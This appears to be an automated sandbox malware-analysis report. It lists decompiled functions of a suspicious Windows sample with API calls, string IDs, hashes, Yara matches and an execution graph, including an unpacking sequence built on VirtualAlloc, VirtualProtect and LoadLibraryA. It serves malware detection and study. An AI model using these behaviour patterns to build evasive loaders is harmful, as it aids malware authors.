                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1E01A355005069BCB09FB62C56059CBB62BF95310B54424A946A972A0CF646A4ADF94
                                                                                                                                                                                                                                            Function 00411E98 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::critical_section::unlock.LIBCMT ref: 00411E9C
                                                                                                                                                                                                                                              • Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411133
                                                                                                                                                                                                                                              • Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041116A
                                                                                                                                                                                                                                              • Part of subcall function 00411112: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411176
                                                                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EA8
                                                                                                                                                                                                                                              • Part of subcall function 00410A83: Concurrency::critical_section::unlock.LIBCMT ref: 00410AA7
                                                                                                                                                                                                                                            • Concurrency::Context::Block.LIBCONCRT ref: 00411EAD
                                                                                                                                                                                                                                              • Part of subcall function 00412C61: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C63
                                                                                                                                                                                                                                            • Concurrency::critical_section::lock.LIBCONCRT ref: 00411ECD
                                                                                                                                                                                                                                              • Part of subcall function 0041103B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411049
                                                                                                                                                                                                                                              • Part of subcall function 0041103B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411056
                                                                                                                                                                                                                                              • Part of subcall function 0041103B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411061
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3659872527-0
                                                                                                                                                                                                                                            • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                                                                                                                                                            • Instruction ID: 9d2f70e3251d3db540e969485d70697033c14617760f295063863c07ed990fb6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BCE0DF34500502ABCB08FB21C5A25ECFB61BF88354B50821FE462432E2CF785E87DB88
                                                                                                                                                                                                                                            Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                            • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                            • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                                                                                                                                                                                            Function 024CB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024CB32B,?,00000050,?,?,?,?,?), ref: 024CB1AB
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 0-711371036
                                                                                                                                                                                                                                            • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                            • Instruction ID: 881f8b524cf696cebf662c0ab2fbeb5e74a2be9ad5acf937dfd872c3db22ddc7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B21A96AA40105A6DBA68F5D8D037A7735AEF40BECF66812EE909D7304EF32D941C390
                                                                                                                                                                                                                                            Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 0-711371036
                                                                                                                                                                                                                                            • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                            • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                                                                                                                                                            Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                                                                                                                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                            • String ID: image/png
                                                                                                                                                                                                                                            • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                            • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                            • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                                                                                                                                                            Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID: F(@
                                                                                                                                                                                                                                            • API String ID: 1452528299-2698495834
                                                                                                                                                                                                                                            • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                            • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                                                                                                                                                            Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                            • String ID: F(@$ios_base::failbit set
                                                                                                                                                                                                                                            • API String ID: 4194217158-1828034088
                                                                                                                                                                                                                                            • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                            • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                                                                                                                                                            Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                            • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                            • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                            • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                                                                                                                                                            Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                                                                                                                                                              • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                                                                                                                                                              • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                                                                                                                                                              • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                                                                                                                                                              • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                            • String ID: F@
                                                                                                                                                                                                                                            • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                            • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                            • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                                                                                                                                                            Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                                                                                                                                                              • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                                            • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                                            • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                                            • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                            • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                                                                                                                                                            Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                            • String ID: zB$~B
                                                                                                                                                                                                                                            • API String ID: 3275300208-395995950
                                                                                                                                                                                                                                            • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                            • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                                                                                                                                                            Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: pThreadProxy
                                                                                                                                                                                                                                            • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                            • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                            • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                                                                                                                                                            Function 024BB0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02492AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02492AAD,00000000), ref: 024BB187
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024BB195
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02492AAD,00000000), ref: 024BB1F0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                                                                                            • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                            • Instruction ID: 7c2054144e0ca0be18c61295da41c3879ff775182cb29d36a43112ccc1edfe54
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B441E831A00216AFDF279F65CC487EF7BA5EF41759F14416AEC599B2A0DB308901CB70
                                                                                                                                                                                                                                            Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                                                                                            • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                            • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:2.2%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:40.6%
                                                                                                                                                                                                                                            Signature Coverage:20.3%
                                                                                                                                                                                                                                            Total number of Nodes:69
                                                                                                                                                                                                                                            Total number of Limit Nodes:5
                                                                                                                                                                                                                                            execution_graph 26279 43cd60 26281 43cd80 26279->26281 26280 43ce3e 26283 43cdbe 26281->26283 26285 43a9b0 LdrInitializeThunk 26281->26285 26283->26280 26286 43a9b0 LdrInitializeThunk 26283->26286 26285->26283 26286->26280 26245 43b545 26246 43b570 26245->26246 26246->26246 26247 43b5ee 26246->26247 26249 43a9b0 LdrInitializeThunk 26246->26249 26249->26247 26292 43b068 26293 43b080 26292->26293 26295 43b16e 26293->26295 26298 43a9b0 LdrInitializeThunk 26293->26298 26296 43b23f 26295->26296 26299 43a9b0 LdrInitializeThunk 26295->26299 26296->26296 26298->26295 26299->26296 26250 40b44c 26254 40b45a 26250->26254 26255 40b57c 26250->26255 26251 40b65c 26257 43a950 RtlFreeHeap 26251->26257 26254->26251 26254->26255 26256 43a950 RtlFreeHeap 26254->26256 26256->26251 26257->26255 26258 43aecc 26260 43af00 26258->26260 26259 43af7e 26260->26259 26262 43a9b0 LdrInitializeThunk 26260->26262 26262->26259 26263 408790 26265 40879f 26263->26265 26264 408970 ExitProcess 26265->26264 26266 4087b4 GetCurrentProcessId GetCurrentThreadId 26265->26266 26269 40887a 26265->26269 26267 4087da 26266->26267 26268 4087de SHGetSpecialFolderPathW GetForegroundWindow 26266->26268 26267->26268 26268->26269 26269->26264 26300 8f89be 26301 8f89cd 26300->26301 26304 8f915e 26301->26304 26309 8f9179 26304->26309 26305 8f9182 CreateToolhelp32Snapshot 26306 8f919e Module32First 26305->26306 26305->26309 26307 8f91ad 26306->26307 26308 8f89d6 26306->26308 26311 8f8e1d 26307->26311 26309->26305 26309->26306 26312 8f8e48 26311->26312 26313 8f8e59 VirtualAlloc 26312->26313 26314 8f8e91 26312->26314 26313->26314 26314->26314 26270 438e51 RtlAllocateHeap 26271 43ab91 26272 43ab9a GetForegroundWindow 26271->26272 26273 43abad 26272->26273 26315 438e70 26316 438e83 26315->26316 26317 438e94 26315->26317 26318 438e88 RtlFreeHeap 26316->26318 26318->26317 26319 249003c 26320 2490049 26319->26320 26334 2490e0f SetErrorMode SetErrorMode 26320->26334 26325 2490265 26326 24902ce VirtualProtect 26325->26326 26328 249030b 26326->26328 26327 2490439 VirtualFree 26332 24905f4 LoadLibraryA 26327->26332 26333 24904be 26327->26333 26328->26327 26329 24904e3 LoadLibraryA 26329->26333 26331 24908c7 26332->26331 26333->26329 26333->26332 26335 2490223 26334->26335 26336 2490d90 26335->26336 26337 2490dad 26336->26337 26338 2490dbb GetPEB 26337->26338 26339 2490238 VirtualAlloc 26337->26339 26338->26339 26339->26325

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4063528623-0
                                                                                                                                                                                                                                            • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                            • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
